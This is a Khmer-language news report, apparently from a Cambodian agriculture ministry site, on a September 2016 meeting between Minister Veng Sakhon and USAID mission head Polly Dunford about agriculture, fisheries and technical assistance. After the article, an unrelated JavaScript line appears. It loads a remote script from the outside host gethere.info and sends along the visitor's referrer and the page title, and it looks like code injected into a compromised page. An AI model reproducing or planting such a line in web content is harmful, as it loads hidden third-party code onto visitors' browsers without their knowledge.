ឯកឧត្តម វេង សាខុនបានជួបសម្តែងការគួរសម និងពិភាក្សាការងារ លោកស្រី Polly Dunford

ភ្នំពេញ៖ នៅរសៀល ថ្ងៃទី១៥ ខែកញ្ញា ឆ្នាំ២០១៦ ឯកឧត្តម វេង សាខុន រដ្ឋមន្ត្រីក្រសួងកសិកម្ម រុក្ខាប្រមាញ់ និងនេសាទ បានអនុញ្ញាតជូន លោកស្រី Polly Dunford ប្រធានក្រុមបេសកកម្មនៃ USAID និងសហការី ជួបសម្តែងការគួរសម និងពិភាក្សាការងារ ដោយផ្តោតលើការបន្តនិងពង្រីកកិច្ចសហប្រតិបត្តិការលើវិស័យកសិកម្ម។ ការពិភាក្សាបានផ្តោតទៅលើ៖
1) បង្កើនផលិតភាពពិធភាវូបនីយកម្មសិកម្ម និងកែលំអការអភិវឌ្ឍនិងគ្រប់គ្រងធនធានទឹក
2) ការគ្រប់គ្រង ការអភិរក្ស និងការអភិវឌ្ឍន៍ប្រកបដោយនិរន្តរភាពធនធានជលផល នៅខេត្តគោលដៅជុំវិញទន្លសាប និងសមុទ្រ
3) ស្វែងយល់ពីទិសដៅជាយុទ្ធសាស្រ្តរបស់ក្រសួងកសិកម្ម រុក្ខាប្រមាញ់ និងនេសាទ ដែលត្រូវអោយអង្គការ USAID បន្តជួយដល់ការអភិវឌ្ឍវិស័យកសិកម្ម
4) ការពិភាក្សាលើសំណើដែលបានស្នើសុំកន្លងមកទៅ USAID លើការផ្តល់ជំនួយបច្ចេកទេសអោយដល់ក្រសួងកសិកម្ម រុក្ខាប្រមាញ់និងនេសាទ ក្នុងការរៀបចំប្រព័ន្ធពត៌មាននៃការធ្វើទំនាក់ទំនងទីផ្សារនៅកម្ពុជានិងសហគមន៍កសិកម្ម ។

 image image image

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More